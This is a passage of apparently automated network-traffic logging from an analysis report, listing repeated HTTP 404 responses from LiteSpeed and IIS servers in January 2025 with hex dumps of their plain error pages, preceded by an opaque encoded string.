-Jkp4f=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXZItDqYCzwdRvAUQkcT5B06jfYgEREYBDoy21cKS7oHrn/+X4g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:10:14 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 04:10:29 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 04:10:31 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 04:10:34 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 04:10:36 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 04:10:43 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 04:10:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 